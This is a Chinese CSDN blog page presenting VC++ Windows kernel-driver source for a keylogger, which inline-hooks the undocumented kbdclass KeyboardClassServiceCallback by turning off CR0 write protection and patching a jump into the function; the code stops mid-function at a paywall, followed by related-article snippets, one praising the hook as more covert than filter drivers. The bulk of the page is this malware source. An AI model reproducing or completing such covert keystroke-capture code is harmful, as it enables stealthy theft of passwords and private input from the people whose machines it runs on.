vc++实现Inline hook KeyboardClassServiceCallback实现键盘记录

最新推荐文章于 2021-05-15 05:04:15 发布
最新推荐文章于 2021-05-15 05:04:15 发布
阅读量7.1k 收藏 4
点赞数
分类专栏: VC++编程技术 VisualC++信息安全编程 WindowsC++编程 文章标签: hook vc++ struct integer object string
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/itcastcpp/article/details/4395104
版权
该博客介绍了如何使用VC++实现内联Hook技术,特别是针对键盘输入服务回调函数KeyboardClassServiceCallback,以实现键盘记录功能。通过禁用写保护、替换函数代码等步骤,详细讲解了键盘钩子的设置和解除过程。
摘要由CSDN通过智能技术生成

/*

 

*/

#ifndef _DBGHELP_H
#define _DBGHELP_H 1

#include <ntddk.h>

#define dprintf if (DBG) DbgPrint
#define nprintf DbgPrint

#define kmalloc(_s) ExAllocatePoolWithTag(NonPagedPool, _s, 'SYSQ')
//#define kfree(_p) ExFreePoolWithTag(_p, 'SYSQ')
#define kfree(_p) ExFreePool(_p)

#endif

#include <ntddk.h>
//#include <ntifs.h>
#include <windef.h>

#include "HookKey.h"
#include "struct.h"
#include <ntddkbd.h>
#define MAXBUF 0x15//存储键盘扫描码的缓冲区,其中第一字节为当前存储位置,
ULONG g_OldFunction;
ULONG g_uCr0;

BYTE g_HookCode[5] = { 0xe9, 0, 0, 0, 0 };
BYTE g_OrigCode[5] = { 0 }; // 原函数的前字节内容
BYTE jmp_orig_code[7] = { 0xEA, 0, 0, 0, 0, 0x08, 0x00 }; //因为是长转移,所以有个 0x08
PDEVICE_OBJECT pDevObj;
BOOL g_bHooked = FALSE;
int KeyCode=0;
PVOID hPageDataSection;
PVOID KeyBuf;
PDEVICE_OBJECT g_kbDeviceObject = NULL;
ULONG g_kbdclass_base ;
ULONG g_lpKbdServiceCallback ;
VOID  ReadKeyBuf();
VOID  ChangeFake_Function();
VOID
fake_OldFunction (
      PDEVICE_OBJECT  DeviceObject,
      PKEYBOARD_INPUT_DATA  InputDataStart,
      PKEYBOARD_INPUT_DATA  InputDataEnd,
      PULONG  InputDataConsumed
      );
#ifdef ALLOC_PRAGMA
#pragma alloc_text(NONPAGED, fake_OldFunction)
#endif

/*

  HookKey.H

  Author: <your name>
  Last Updated: 2006-02-12

  This framework is generated by EasySYS 0.3.0
  This template file is copying from QuickSYS 0.3.0 written by Chunhua Liu

*/

#ifndef _HOOKKEY_H
#define _HOOKKEY_H 1

//
// Define the various device type values.  Note that values used by Microsoft
// Corporation are in the range 0-0x7FFF(32767), and 0x8000(32768)-0xFFFF(65535)
// are reserved for use by customers.
//

#define FILE_DEVICE_HOOKKEY 0x8000

//
// Macro definition for defining IOCTL and FSCTL function control codes. Note
// that function codes 0-0x7FF(2047) are reserved for Microsoft Corporation,
// and 0x800(2048)-0xFFF(4095) are reserved for customers.
//

#define HOOKKEY_IOCTL_BASE 0x800

//
// The device driver IOCTLs
//

#define CTL_CODE_HOOKKEY(i) CTL_CODE(FILE_DEVICE_HOOKKEY, HOOKKEY_IOCTL_BASE+i, METHOD_BUFFERED, FILE_ANY_ACCESS)

#define IOCTL_HOOKKEY_HELLO CTL_CODE_HOOKKEY(0)
#define IOCTL_HOOKKEY_TEST CTL_CODE_HOOKKEY(1)

//
// Name that Win32 front end will use to open the HookKey device
//

#define HOOKKEY_WIN32_DEVICE_NAME_A ".//HookKey"
#define HOOKKEY_WIN32_DEVICE_NAME_W L".//HookKey"
#define HOOKKEY_DEVICE_NAME_A   "//Device//HookKey"
#define HOOKKEY_DEVICE_NAME_W   L"//Device//HookKey"
#define HOOKKEY_DOS_DEVICE_NAME_A  "//DosDevices//HookKey"
#define HOOKKEY_DOS_DEVICE_NAME_W  L"//DosDevices//HookKey"

#ifdef _UNICODE
#define HOOKKEY_WIN32_DEVICE_NAME HOOKKEY_WIN32_DEVICE_NAME_W
#define HOOKKEY_DEVICE_NAME  HOOKKEY_DEVICE_NAME_W
#define HOOKKEY_DOS_DEVICE_NAME HOOKKEY_DOS_DEVICE_NAME_W
#else
#define HOOKKEY_WIN32_DEVICE_NAME HOOKKEY_WIN32_DEVICE_NAME_A
#define HOOKKEY_DEVICE_NAME  HOOKKEY_DEVICE_NAME_A
#define HOOKKEY_DOS_DEVICE_NAME HOOKKEY_DOS_DEVICE_NAME_A
#endif

#endif
   
VOID
Proxy_OldFunction (
PDEVICE_OBJECT  DeviceObject,
PKEYBOARD_INPUT_DATA  InputDataStart,
PKEYBOARD_INPUT_DATA  InputDataEnd,
PULONG  InputDataConsumed
    );
typedef VOID
(*My_KeyboardClassServiceCallback) (
         PDEVICE_OBJECT  DeviceObject,
         PKEYBOARD_INPUT_DATA  InputDataStart,
         PKEYBOARD_INPUT_DATA  InputDataEnd,
         PULONG  InputDataConsumed
         );
My_KeyboardClassServiceCallback orig_KeyboardClassServiceCallback = NULL;
void WPOFF()
{
  
    ULONG uAttr;
  
    _asm
    {
        push eax;
        mov eax, cr0;
        mov uAttr, eax;
        and eax, 0FFFEFFFFh; // CR0 16 BIT = 0
        mov cr0, eax;
        pop eax;
        cli
    };
  
    g_uCr0 = uAttr; //保存原有的 CRO 屬性
  
}

VOID WPON()
{
  
    _asm
    {
        sti
        push eax;
        mov eax, g_uCr0; //恢復原有 CR0 屬性
        mov cr0, eax;
        pop eax;
    };
  
}


//
// 停止inline hook
//
VOID UnHookOldFunction ()
{
    KIRQL  oldIrql;

    WPOFF();
    oldIrql = KeRaiseIrqlToDpcLevel();
   
    RtlCopyMemory ( (BYTE*)g_OldFunction, g_OrigCode, 5 );

    KeLowerIrql(oldIrql);
    WPON();

    g_bHooked = FALSE;
}


//
// 开始inline hook --  OldFunction
//
VOID HookOldFunction ()
{
    KIRQL  oldIrql;

    if (g_OldFunction == 0) {
        DbgPrint("OldFunction == NULL/n");
        return;
    }

    //DbgPrint("开始inline hook --  OldFunction/n");
    DbgPrint( "OldFunction的地址t0x%08x/n", (ULONG)g_OldFunction );
    // 保存原函数的前字节内容
    RtlCopyMemory (g_OrigCode, (BYTE*)g_OldFunction, 5);//★
    *( (ULONG*)(g_HookCode + 1) ) = (ULONG)fake_OldFunction - (ULONG)g_OldFunction - 5;//★
   
   
    // 禁止系统写保护,提升IRQL到DPC
    WPOFF();
    oldIrql = KeRaiseIrqlToDpcLevel();
 
    RtlCopyMemory ( (BYTE*)g_OldFunction, g_HookCode, 5 );
    *( (ULONG*)(jmp_orig_code

最低0.47元/天 解锁文章
尹成
关注
专栏目录
KeyboardClassServiceCallback
06-30
KeyboardClassServiceCallback
Hook KeyboardClassServiceCallback实现键盘 Logger
mergerly的专栏
11-13 8989
 用DeviceTree 可以看到PS/2键盘的端口驱动是i8042prt,USB键盘的端口驱动是Kbdhid。无论是PS/2 键盘还是USB键盘,在端口驱动处理完IRP之后都会调用上层处理的回调函数,即KbdClass 处理输入数据的函数。Hook 这个回调函数,不但可以实现兼容PS/2 键盘和USB 键盘的Logger,而且比分层驱动的方法更加隐蔽。Kbdclass的这个回调函数是未导出的
键盘驱动笔记
04-13 3647
前段时间想写一个简单的键盘驱动,就找网上找了一些文档看看。JIURL的键盘驱动5篇文章都很精彩,让人很快就能明白键盘驱动的原理。一般情况微软建议写的键盘驱动都是属于keyboard filter driver,它位于kbdclass和i8042prt驱动之间。利用IOCTL_INTERNAL_KEYBOARD_CONNECT来挂接KeyboardClassServiceCallback,然后在I8
键盘消息
SR0ad的涅盘地
12-03 873
今天看了一下键盘消息的内容,其实主要的内容就在下面这张图片里面了。 通过键盘input,不管是PS/2还是USB,都会通过底层的处理,去调用KeyBoardClassServiceCallBack(); 它是第一层处理函数,通过构造参数去调用这个函数,是能达到模拟按键的。 再往上层走,通过SendInput();可以构造中文数据。 另外的就是通过消息机制,向
vc_hook.rar_hook_hook vc++_hook键盘记录_vc hook
09-20
本资源“vc_hook.rar_hook_hook_vc++_hook键盘记录_vc hook”显然是一个使用VC++(Visual C++)开发的,涉及到Windows API Hook技术的项目,其主要目标是记录键盘输入。下面我们将详细探讨相关的知识点。 1. **Hook...
VC++ 不使用hook实现键盘记录(含中文)
10-30
本文将深入探讨如何使用VC++不依赖hook技术来实现键盘记录功能,尤其是处理中文输入。 首先,我们要了解传统的键盘记录方法通常会使用API钩子(API Hook),如SetWindowsHookEx函数,来拦截键盘事件。然而,这种...
使用内核三步实现InlineHook的详细分析
07-06
本文讨论的是具有通用性的两类inlineHook实现.   Inlinehook原理:解析函数开头的几条指令,把他们Copy到数组保存起来,然后用一个调用我们的函数的几条指令来替换,如果要执行原函数,则在我们函数处理...
C++实现inline hook的原理及应用实例
09-04
C++实现inline hook,主要是通过在目标函数的内存空间中插入跳转指令,使得当函数被调用时,控制流会跳转到我们自定义的代理函数(proxy function)中。代理函数在完成特定操作后,再将控制权交还给原始函数,以...
Keyboard/Mouse驱动驱动的工作原理
weixin_33885253的博客
06-29 2139
不管是USB或者8042或者虚拟的Keyboard/Mouse,设备栈最上层都是Kbdclass或者Mouclass,操作系统会专门有个现成不停的向设备栈发送Read IRP。 kd> !devstack 80d8eaa0 !DevObj !DrvObj !DevExt ObjectName > 80d8eaa0 \Driver\Kbdc...
linux ps2键盘驱动,通用键盘鼠标模拟(包括USB和PS2)
weixin_31221157的博客
05-15 780
通过直接调用Kbdclass的回调函数KeyboardClassServiceCallback直接给上层发送键盘驱动。这个方法网上已经公开,参考Hook KeyboardClassServiceCallback实现键盘 Logger,其他的还有很多,可以到网上去查。简单说一下没有公开的部分,就是按下和松开的模拟,已经扩展键的模拟。模拟主要是构造KEYBOARD_INPUT_DATA结构,按下和松开...
驱动中实现模拟键盘按键
04-26 9835
标 题: 驱动中实现模拟键盘按键作 者: luocong在ring3中实现模拟键盘按键有N^N种方式,比如SendInput()、keybd_event()……但在驱动中要怎么模拟呢?1、写端口大法#define defI8042_DATA_PORT ((PUCHAR)0x60)#define defI8042
进程peb结构、获得peb的方法
HsinTsao的博客
03-05 3197
PEB :进程环境块TEB.ProcessEnvironmentBlock成员就是PEB的结构体地址TEB结构体位于FS段选择符所指的段内存的起始地址处,且ProcessEnvironmentBlock成员位于距TEB结构体Offset 30的位置即有两种方法获得PEB的地址:peb的结构申明:typedef struct _UNICODE_STR { USHORT Length; ...
在VC中ADE32反汇编引擎的使用,打算配合inline hook使用。。(~ o ~)~zZ
xiaoqiangvs007的专栏
04-29 2066
ADE32下载,CSDN上有,自己找下1 在工程文件中加入ADE32.OBJ  和ADE32.H2 在工程的CPP文件中加入extern "C"{#include "ADE32.H"void ade32_init(DWORD *);DWORD ade32_disasm(BYTE *, disasm_struct *, DWORD *);DWORD ade
_KEYBOARD_INPUT_DATA
test
05-17 3360
_KEYBOARD_INPUT_DATA
DD驱动 虚拟键盘 虚拟鼠标
ddv2012的专栏
04-18 4381
最简单好用的驱动级虚拟鼠标虚拟键盘支持 WINXP , WIN2003 , WIN2008 , VISTA , WIN7 ,32位和64位操作系统。适用 VB6, DELPHI, VC, BC, VB.NET, C#, 易语言等各种编程语言写的应用程序调用。一键安装和卸载,实现模拟按键操作只需加载DD入口文件DD_EntryNNNNN.dll ,然后调用接口函数即可。个
深入解析内核 Inline Hook 实现
"详谈内核的Inline Hook实现" 本文深入探讨了内核级Inline Hook的原理和实现Inline Hook是一种强大的技术,它允许我们在函数执行过程中插入自定义的行为,以达到控制或过滤函数操作的目的。在理解Inline Hook之前...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尹成

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值